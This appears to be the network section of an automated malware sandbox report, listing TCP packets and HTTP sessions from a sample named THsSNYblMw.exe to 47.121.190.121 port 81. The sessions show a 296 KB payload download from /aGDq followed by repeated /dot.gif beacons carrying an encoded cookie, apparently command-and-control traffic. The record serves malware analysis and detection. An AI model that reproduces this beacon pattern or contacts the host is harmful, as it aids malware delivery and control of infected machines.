Jan 9, 2025 23:10:48.283308029 CET	50201	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:48.288180113 CET	81	50201	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:48.288420916 CET	50201	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:48.288420916 CET	50201	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:48.293221951 CET	81	50201	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:49.231914043 CET	81	50201	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:49.231970072 CET	81	50201	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:49.232008934 CET	50201	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:49.232008934 CET	50201	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:49.232089996 CET	50201	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:49.237063885 CET	81	50201	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:49.346188068 CET	50202	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:49.351424932 CET	81	50202	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:49.351512909 CET	50202	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:49.351663113 CET	50202	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:49.356473923 CET	81	50202	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:50.315201998 CET	81	50202	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:50.315227985 CET	81	50202	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:50.315464020 CET	50202	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:50.315464020 CET	50202	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:50.320462942 CET	81	50202	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:50.423728943 CET	50203	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:50.428642988 CET	81	50203	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:50.428740025 CET	50203	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:50.431622028 CET	50203	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:50.436434984 CET	81	50203	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:51.365658998 CET	81	50203	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:51.365714073 CET	50203	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:51.365763903 CET	81	50203	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:51.365871906 CET	50203	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:51.365941048 CET	50203	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:51.370805979 CET	81	50203	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:51.471775055 CET	50204	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:51.476721048 CET	81	50204	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:51.476794004 CET	50204	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:51.477009058 CET	50204	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:51.481832027 CET	81	50204	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:52.456490993 CET	81	50204	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:52.456660032 CET	81	50204	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:52.456857920 CET	50204	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:52.459628105 CET	50204	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:52.464812040 CET	81	50204	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:52.564666986 CET	50205	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:52.569910049 CET	81	50205	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:52.573256969 CET	50205	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:52.575481892 CET	50205	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:52.580410004 CET	81	50205	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:53.516403913 CET	81	50205	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:53.516463041 CET	81	50205	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:53.516486883 CET	50205	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:53.516562939 CET	50205	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:53.516968012 CET	50205	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:53.521853924 CET	81	50205	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:53.652420044 CET	50206	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:53.657922983 CET	81	50206	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:53.658003092 CET	50206	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:53.659831047 CET	50206	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:53.664755106 CET	81	50206	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:54.607033014 CET	81	50206	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:54.607580900 CET	81	50206	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:54.607903957 CET	50206	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:54.607903957 CET	50206	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:54.612869024 CET	81	50206	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:54.723687887 CET	50207	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:54.728677988 CET	81	50207	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:54.731637955 CET	50207	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:54.731765032 CET	50207	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:54.737164974 CET	81	50207	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:55.687546968 CET	81	50207	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:55.687629938 CET	50207	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:55.687724113 CET	81	50207	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:55.687788010 CET	50207	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:55.803061962 CET	50207	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:55.803510904 CET	50208	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:55.807948112 CET	81	50207	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:55.808387041 CET	81	50208	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:55.808459044 CET	50208	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:55.808589935 CET	50208	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:55.813388109 CET	81	50208	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:56.767945051 CET	81	50208	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:56.768074036 CET	81	50208	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:56.768150091 CET	50208	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:56.768291950 CET	50208	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:56.768291950 CET	50208	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:56.773140907 CET	81	50208	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:56.876966000 CET	50209	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:56.882054090 CET	81	50209	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:56.882179976 CET	50209	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:56.882262945 CET	50209	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:56.887073040 CET	81	50209	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:57.865101099 CET	81	50209	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:57.865153074 CET	81	50209	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:57.865174055 CET	50209	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:57.865245104 CET	50209	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:57.865905046 CET	50209	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:57.870735884 CET	81	50209	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:57.971260071 CET	50210	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:57.976464033 CET	81	50210	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:57.976540089 CET	50210	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:57.976677895 CET	50210	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:57.981453896 CET	81	50210	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:58.940764904 CET	81	50210	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:58.940820932 CET	81	50210	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:58.940968037 CET	50210	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:58.940968990 CET	50210	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:58.941066027 CET	50210	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:58.946005106 CET	81	50210	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:59.049499035 CET	50211	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:59.054466009 CET	81	50211	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:59.057568073 CET	50211	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:59.057708025 CET	50211	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:59.062541008 CET	81	50211	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:00.019953966 CET	81	50211	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:00.020015955 CET	81	50211	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:00.020035982 CET	50211	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:00.020112991 CET	50211	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:00.020147085 CET	50211	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:00.024983883 CET	81	50211	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:00.129508972 CET	50212	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:00.134718895 CET	81	50212	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:00.136389971 CET	50212	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:00.136517048 CET	50212	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:00.141402006 CET	81	50212	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:01.097429037 CET	81	50212	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:01.097521067 CET	81	50212	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:01.097548962 CET	50212	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:01.101557016 CET	50212	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:01.205866098 CET	50212	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:01.206283092 CET	50213	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:01.210978031 CET	81	50212	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:01.211177111 CET	81	50213	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:01.211256981 CET	50213	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:01.211417913 CET	50213	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:01.216274023 CET	81	50213	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:02.178291082 CET	81	50213	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:02.178381920 CET	81	50213	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:02.185724020 CET	50213	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:02.301613092 CET	50213	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:02.306929111 CET	81	50213	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:02.478007078 CET	50214	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:02.483241081 CET	81	50214	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:02.484402895 CET	50214	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:02.505728006 CET	50214	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:02.510734081 CET	81	50214	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:03.430270910 CET	81	50214	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:03.430332899 CET	50214	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:03.430366993 CET	81	50214	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:03.430403948 CET	50214	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:03.430546045 CET	50214	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:03.436347961 CET	81	50214	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:03.534116030 CET	50215	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:03.539146900 CET	81	50215	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:03.539237976 CET	50215	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:03.539366961 CET	50215	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:03.544233084 CET	81	50215	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:04.480891943 CET	81	50215	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:04.480988979 CET	81	50215	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:04.483711958 CET	50215	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:04.483851910 CET	50215	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:04.488679886 CET	81	50215	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:04.596775055 CET	50216	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:04.601710081 CET	81	50216	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:04.604288101 CET	50216	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:04.605001926 CET	50216	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:04.609842062 CET	81	50216	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:05.607880116 CET	81	50216	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:05.608069897 CET	50216	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:11:05.609806061 CET	81	50216	47.121.190.121	192.168.2.4
Jan 9, 2025 23:11:05.609863043 CET	50216	81	192.168.2.4	47.121.190.121

HTTP Request Dependency Graph

47.121.190.121:81

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:06:59.448566914 CET	195	OUT	GET /aGDq HTTP/1.1 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; Avant Browser) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:00.381597042 CET	119	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:00 GMT Content-Type: application/octet-stream Content-Length: 296007

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:03.704940081 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:04.635081053 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:04 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:04.755903959 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:05.715003967 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:05 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:06.026402950 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:06.961216927 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:06 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:07.082813025 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:08.025019884 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:07 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:08.161093950 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:09.111773014 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:08 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:09.223571062 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:10.187959909 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:10 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:10.302876949 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:11.235402107 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:11 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:11.348274946 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:12.299562931 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:12 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49739	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:12.562726974 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:13.522588015 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:13 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49740	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:13.630179882 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:14.573329926 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:14 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49741	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:14.692231894 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:15.718978882 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:15 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49743	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:15.832549095 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:16.795145988 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:16 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49747	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:16.911009073 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
Jan 9, 2025 23:07:17.879784107 CET	114	IN	HTTP/1.1 200 OK Date: Thu, 9 Jan 2025 22:07:17 GMT Content-Type: application/octet-stream Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49749	47.121.190.121	81	6864	C:\Users\user\Desktop\THsSNYblMw.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 23:07:17.989392042 CET	386	OUT	GET /dot.gif HTTP/1.1 Accept: / Cookie: ZWwbsQji5zO0/8hEeUlBtAKxVw/RyZ2C3sepsKjuEPefnaEnRdnKXXH0tuaGyKGmoQATE4cOrXp3d9h0oXL+K6WeEPN6ONoW5EMo/pVZFJSPjJga2zczDS99eh1T5uf6MvZ6V4go+4VJ26AJpOx+B6L5aZkE2nauYcs2Q8YIp6w= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MDDRJS) Host: 47.121.190.121:81 Connection: Keep-Alive Cache-Control: no-cache
